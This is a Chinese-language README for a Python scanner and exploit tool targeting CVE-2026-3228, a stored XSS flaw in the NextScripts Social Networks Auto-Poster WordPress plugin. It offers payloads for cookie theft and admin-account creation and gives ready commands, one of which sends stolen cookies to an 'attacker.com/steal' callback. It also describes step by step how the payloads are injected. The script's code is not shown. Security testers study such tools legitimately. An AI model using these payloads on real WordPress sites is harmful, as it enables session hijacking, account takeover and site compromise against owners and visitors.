
扫描并利用 CVE-2026-3228,这是 NextScripts WordPress 插件中的一个存储型 XSS 漏洞,支持预认证检测、认证检查以及用于 PoC、Cookie 窃取或创建管理员的载荷注入。
CVE-2026-3228 - NextScripts WordPress 插件存储型 XSS 扫描器与利用工具
https://img.shields.io/badge/python-3.6+-blue.svg
https://img.shields.io/badge/license-MIT-green
https://img.shields.io/badge/WordPress-Plugin-red
作者:NULL200OK
一个全面的 Python 工具,用于扫描和利用 CVE-2026-3228,这是 NextScripts:Social Networks Auto-Poster WordPress 插件(版本 ≤ 4.4.6)中的一个存储型跨站脚本(XSS)漏洞。
该漏洞允许具有 Contributor 级别或更高权限的已认证用户通过 [nxs_fbembed] 短代码注入任意 JavaScript。当管理员查看被感染的帖子时,脚本会在其浏览器中执行,可能导致会话劫持、创建管理员账户或网站被入侵。
📦 功能特性
info – 显示详细的 CVE 信息(描述、根本原因、影响)。
scan – 预认证扫描,用于检测插件及其版本。
check – 带凭据的综合检查(登录、权限验证、版本检测)。
exploit – 利用易受攻击的短代码向新帖子注入恶意 XSS 载荷。
多种载荷类型:
alert – 用于概念验证的简单弹窗框。
cookie – 窃取会话 Cookie 并将其发送到回调 URL。
admin – 尝试创建新的管理员用户(需要管理员查看页面)。
html – 带 onerror 事件的基本 HTML 注入。
custom – 用户提供的 JavaScript。
all – 在单独的帖子中注入所有载荷类型。
自动认证 – 处理 WordPress 登录、会话管理和 nonce 提取。
备用注入方法 – 先尝试 REST API,再回退到传统表单提交。
用户友好的输出 – 彩色状态消息和清晰的分步指导。
🚨 漏洞概述
CVE ID:CVE-2026-3228
CVSS 评分:6.4(中危)
受影响插件:NextScripts:Social Networks Auto-Poster ≤ 4.4.6
根本原因:
对 snapFB 帖子元数据的输入清理不足。
渲染 [nxs_fbembed] 短代码时输出转义不足。
所需权限:Contributor 级别账户或更高。
影响:攻击者可以在任何查看被感染帖子的用户(包括管理员)的上下文中执行任意 JavaScript,导致网站完全被入侵。
⚙️ 环境要求
Python 3.6+
requests
beautifulsoup4
安装依赖:
bash
pip install requests beautifulsoup4
🔧 安装
bash
git clone https://github.com/NULL200OK/CVE-2026-3228.git
cd CVE-2026-3228
📚 使用方法
text
usage: CVE-2026-3228.py [-h] {info,scan,check,exploit} ...
CVE-2026-3228 - NextScripts WordPress 插件存储型 XSS 扫描器与利用工具
位置参数:
{info,scan,check,exploit}
info 显示有关该 CVE 的详细信息
scan 检查目标是否存在漏洞(预认证)
check 带凭据的综合检查
exploit 利用该漏洞(需要有效凭据)
可选参数:
-h, --help 显示此帮助消息并退出
bash
python3 CVE-2026-3228.py info
bash
python3 CVE-2026-3228.py scan https://example.com
bash
python3 CVE-2026-3228.py check https://example.com -u contributor -p password
基本 alert 载荷(PoC)
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type alert
窃取 Cookie(需要监听器)
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type cookie --callback-url https://attacker.com/steal
尝试创建管理员用户(当管理员查看页面时)
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type admin
注入所有载荷类型
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type all
自定义 JavaScript
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type custom --custom-js "console.log('pwned')"
🧠 工作原理(分步说明)
认证 – 脚本使用提供的凭据登录 WordPress 并维持会话。
权限检查 – 验证登录用户是否至少具有 Contributor 级别访问权限(创建帖子所需)。
载荷生成 – 根据所选类型创建 JavaScript 载荷。
注入 – 创建包含易受攻击的 [nxs_fbembed] 短代码的新帖子。恶意脚本被放置在 snapFB 帖子元数据字段中,该字段未被插件正确清理。
存储 – 帖子被发布(或保存为草稿),载荷被存储在数据库中。
触发 – 当管理员(或任何用户)查看帖子时,未清理的脚本会被渲染并在其浏览器中执行。
利用后 – 根据载荷类型,攻击者可以窃取 Cookie、创建管理员账户或执行其他操作。
该脚本首先尝试通过 WordPress REST API 进行注入(更快、更干净)。如果失败,则回退到传统表单提交,从帖子编辑器页面提取所需的 nonce。
⚠️ 免责声明
此工具仅用于教育和授权安全测试目的。 未经授权对您不拥有或没有明确测试许可的系统使用此工具是违法的。作者(NULL200OK)不承担任何责任,也不对因使用此脚本而造成的任何滥用或损害负责。
📄 许可证
本项目基于 MIT 许可证授权 – 详情请参阅 LICENSE 文件。
📬 参考资料
MITRE CVE‑2026‑3228(占位符)
WordPress 插件目录
OWASP 存储型 XSS